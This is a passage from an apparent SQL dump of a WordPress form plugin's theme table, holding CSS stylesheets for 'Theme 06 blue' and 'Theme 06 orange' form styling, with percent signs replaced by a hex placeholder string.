#000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: left !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #ffffff;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #ffffff;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 23px;\r\n	height: 23px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #ABAAAA !important;\r\n}',0),(21,'Theme 06 blue','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #BBDBE7;\r\nborder: 1px solid #25A5DF;\r\nmargin-bottom: 10px;\r\ncolor: #25A5DF;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: transparent !important;\r\n	margin: 7px 0px;\r\nborder:1px solid #ABAAAA !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 4px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: transparent;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 1px solid #ABAAAA;\r\n	border-radius: 7px;\r\n	color: #4C4C4C;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 25px;\r\n	width: 28px;\r\n	background: url([SITE_ROOT]/images/06/01.png) no-repeat 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 66px;\r\n	height: 49px;\r\n	background: url([SITE_ROOT]/images/06/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\nbackground: url([SITE_ROOT]/images/06/next.png) no-repeat right #0D66B1;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\nborder: 1px solid #107DAF;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\nbackground: url([SITE_ROOT]/images/06/next.png) no-repeat right #25A5DF;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #959595;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #E8E8E8;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #0D66B1;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #107DAF;\r\n}\r\n.button-submit:hover {\r\n	background: #25A5DF;\r\n}\r\n.button-reset {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #959595;\r\n	margin-left: 5px;\r\n}\r\n.button-reset:hover {\r\n	background: #E8E8E8;\r\n}\r\n.wdform_page {\r\n	background: #BBDBE7;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #0D66B1;\r\n	color: #ffffff;\r\n	font-size: 16px;\r\n	text-align: left;\r\npadding: 7px 30px 10px;\r\n}\r\n\r\n.wdform_section_break2:after {\r\n	content: \" \" ;\r\n	position: relative;\r\n	width: 16px;\r\n	height: 13px;\r\n	top: -3px;\r\n	left: 1px;\r\n	box-shadow: 0px 7px 2px #c9c9c9;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\n	margin: 16px 10px 16px 0px;\r\ncolor:#4C4C4C;\r\n	font-size: 16px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 5px;\r\n	height: 27px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ABAAAA;\r\nbackground: transparent;\r\ncolor: #5C5C5C;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type=\"password\"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ntextarea {\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border: 1px solid #0176AA ;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border: 1px solid #0176AA ;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #0176AA ;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #0176AA ;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/06/date.png) no-repeat left 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\nbox-shadow: 0px 3px 9px 1px rgb(218, 218, 218) inset;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #4C4C4C;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #4C4C4C;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #0176AA;\r\n	margin-right: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #008AFF;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 20px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-right: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #0073D3 ;\r\n	background: -moz-linear-gradient(left, #0073D3 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #008FE1 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00A7ED 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0073D3 ), color-stop(39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #008FE1 ), color-stop(100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00A7ED ));\r\n	background: -webkit-linear-gradient(left, #0073D3 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #008FE1 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00A7ED 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n	background: -o-linear-gradient(left, #0073D3 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #008FE1 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00A7ED 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -webkit-linear-gradient(left, #0073D3 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #008FE1 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #00A7ED 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #0176AA;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: left !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #ffffff;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #ffffff;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 23px;\r\n	height: 23px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #ABAAAA !important;\r\n}',0),(22,'Theme 06 orange','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EEEF;\r\nborder: 1px solid #FAB17A;\r\nmargin-bottom: 10px;\r\ncolor: #FAB17A;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: transparent !important;\r\n	margin: 7px 0px;\r\nborder:1px solid #ABAAAA !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 4px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: transparent;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 1px solid #ABAAAA;\r\n	border-radius: 7px;\r\n	color: #4C4C4C;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 25px;\r\n	width: 28px;\r\n	background: url([SITE_ROOT]/images/06/01.png) no-repeat 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: 